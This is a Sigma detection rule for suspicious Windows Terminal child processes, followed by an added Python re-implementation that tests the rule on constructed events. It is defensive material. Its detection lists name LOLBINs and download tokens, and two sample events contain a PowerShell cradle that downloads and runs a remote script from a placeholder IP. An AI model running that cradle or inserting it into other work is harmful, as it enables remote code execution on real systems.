Suspicious WindowsTerminal Child Processes

Detects suspicious child processes spawned by the Windows Terminal application (WindowsTerminal.exe or wt.exe). Because a Windows Terminal profile can carry an arbitrary "commandline", such children can be a sign of persistence via a planted or modified profile (see the references listed in the rule).

Sigma rule

title: Suspicious WindowsTerminal Child Processes
id: 8de89e52-f6e1-4b5b-afd1-41ecfa300d48
status: test
description: Detects suspicious children spawned via the Windows Terminal application which could be a sign of persistence via WindowsTerminal (see references section)
references:
    - https://persistence-info.github.io/Data/windowsterminalprofile.html
    - https://twitter.com/nas_bench/status/1550836225652686848
author: Nasreddine Bencherchali (Nextron Systems)
date: 2022-07-25
modified: 2023-02-14
tags:
    - attack.execution
    - attack.persistence
logsource:
    category: process_creation
    product: windows
detection:
    selection_parent:
        ParentImage|endswith:
            - '\WindowsTerminal.exe'
            - '\wt.exe'
    selection_susp:
        - Image|endswith:
              # Add more LOLBINS
              - '\rundll32.exe'
              - '\regsvr32.exe'
              - '\certutil.exe'
              - '\cscript.exe'
              - '\wscript.exe'
              - '\csc.exe'
        - Image|contains:
              # Add more suspicious paths
              - 'C:\Users\Public\'
              - '\Downloads\'
              - '\Desktop\'
              - '\AppData\Local\Temp\'
              - '\Windows\TEMP\'
        - CommandLine|contains:
              # Add more suspicious commandline
              - ' iex '
              - ' icm'
              - 'Invoke-'
              - 'Import-Module '
              - 'ipmo '
              - 'DownloadString('
              - ' /c '
              - ' /k '
              - ' /r '
    filter_builtin_visual_studio_shell:
        CommandLine|contains|all:
            - 'Import-Module'
            - 'Microsoft.VisualStudio.DevShell.dll'
            - 'Enter-VsDevShell'
    filter_open_settings:
        CommandLine|contains|all:
            - '\AppData\Local\Packages\Microsoft.WindowsTerminal_'
            - '\LocalState\settings.json'
    filter_vsdevcmd:
        CommandLine|contains|all:
            - 'C:\Program Files\Microsoft Visual Studio\'
            - '\Common7\Tools\VsDevCmd.bat'
    condition: all of selection_* and not 1 of filter_*
falsepositives:
    - Other legitimate "Windows Terminal" profiles
level: medium
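To see how the rule actually evaluates, the following is an added worked example (it is not part of the Sigma rule or of the SigmaHQ project): a small Python re-implementation of the rule's logic run over constructed process_creation events. It reproduces the parent check, the three OR-ed `selection_susp` lists, the three `contains|all` filters and the `all of selection_* and not 1 of filter_*` condition, and reports which branch fired or which filter suppressed a hit. Sigma string matching is case-insensitive by default, so all comparisons are done in lower case. The field names follow the Sigma Windows process_creation taxonomy (Image, ParentImage, CommandLine); the sample events, paths, host names and IP addresses are invented for the example and the Windows Terminal install path is shortened.

```python
# Added example: re-implementation of the Sigma rule above for illustration.
# The match values are copied verbatim from the rule; the events are constructed.

PARENT_SUFFIXES = ("\\windowsterminal.exe", "\\wt.exe")
LOLBIN_SUFFIXES = ("\\rundll32.exe", "\\regsvr32.exe", "\\certutil.exe",
                   "\\cscript.exe", "\\wscript.exe", "\\csc.exe")
SUSP_PATHS = ("c:\\users\\public\\", "\\downloads\\", "\\desktop\\",
              "\\appdata\\local\\temp\\", "\\windows\\temp\\")
SUSP_CMDLINE = (" iex ", " icm", "invoke-", "import-module ", "ipmo ",
                "downloadstring(", " /c ", " /k ", " /r ")
# contains|all: every needle of a filter must be present in CommandLine.
FILTERS = {
    "filter_builtin_visual_studio_shell": (
        "import-module", "microsoft.visualstudio.devshell.dll", "enter-vsdevshell"),
    "filter_open_settings": (
        "\\appdata\\local\\packages\\microsoft.windowsterminal_",
        "\\localstate\\settings.json"),
    "filter_vsdevcmd": (
        "c:\\program files\\microsoft visual studio\\",
        "\\common7\\tools\\vsdevcmd.bat"),
}


def evaluate(event):
    """Return the verdict for one process_creation event together with the
    selection branches that matched and the filters that suppressed it."""
    image = event.get("Image", "").lower()
    parent = event.get("ParentImage", "").lower()
    cmdline = event.get("CommandLine", "").lower()

    reasons = []                                   # selection_susp is an OR of three lists
    if image.endswith(LOLBIN_SUFFIXES):
        reasons.append("Image is a listed LOLBIN")
    if any(p in image for p in SUSP_PATHS):
        reasons.append("Image is under a suspicious path")
    if any(s in cmdline for s in SUSP_CMDLINE):
        reasons.append("CommandLine contains a suspicious token")

    suppressed_by = [name for name, needles in FILTERS.items()
                     if all(n in cmdline for n in needles)]

    alert = (parent.endswith(PARENT_SUFFIXES)     # selection_parent
             and bool(reasons)                    # selection_susp
             and not suppressed_by)               # not 1 of filter_*
    return {"alert": alert, "reasons": reasons, "suppressed_by": suppressed_by}


def run(events):
    """Evaluate a batch and return the indexes of the events that alert."""
    return [i for i, ev in enumerate(events) if evaluate(ev)["alert"]]


# Constructed sample events (not real telemetry); install path shortened.
WT = r"C:\Program Files\WindowsApps\Microsoft.WindowsTerminal_x64\WindowsTerminal.exe"
SAMPLE_EVENTS = [
    {   # 0: a profile "commandline" that fetches and runs a remote script -> alert
        "ParentImage": WT,
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": "powershell.exe -NoProfile -c \"iex (New-Object Net.WebClient)"
                       ".DownloadString('http://192.0.2.10/p.ps1')\"",
    },
    {   # 1: profile launching a binary dropped in the user's Temp folder -> alert
        "ParentImage": WT,
        "Image": r"C:\Users\alice\AppData\Local\Temp\svc_update.exe",
        "CommandLine": "svc_update.exe --silent",
    },
    {   # 2: the built-in Visual Studio "Developer PowerShell" profile -> filtered
        "ParentImage": WT,
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": r'powershell.exe -noe -c "&{Import-Module """C:\Program Files'
                       r'\Microsoft Visual Studio\2022\Community\Common7\Tools'
                       r'\Microsoft.VisualStudio.DevShell.dll"""; Enter-VsDevShell 1a2b3c4d}"',
    },
    {   # 3: a plain cmd.exe profile -> nothing suspicious
        "ParentImage": WT,
        "Image": r"C:\Windows\System32\cmd.exe",
        "CommandLine": "cmd.exe",
    },
    {   # 4: same stager as event 0 but spawned by explorer.exe -> out of scope for this rule
        "ParentImage": r"C:\Windows\explorer.exe",
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": "powershell.exe -c \"iex (New-Object Net.WebClient)"
                       ".DownloadString('http://192.0.2.10/p.ps1')\"",
    },
]

if __name__ == "__main__":
    for i, ev in enumerate(SAMPLE_EVENTS):
        print(i, evaluate(ev))
    print("alerts:", run(SAMPLE_EVENTS))   # [0, 1]
```

Two things the run makes visible. Event 0 is caught only by `DownloadString(`: the `' iex '` token needs a space on both sides, so `-c "iex (...)"` does not match it, which is worth remembering when extending the command-line list. Event 2 matches `'Import-Module '` but is suppressed because all three needles of `filter_builtin_visual_studio_shell` are present; any other legitimate profile that imports a module would still fire, which is what the rule's false-positives entry warns about.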
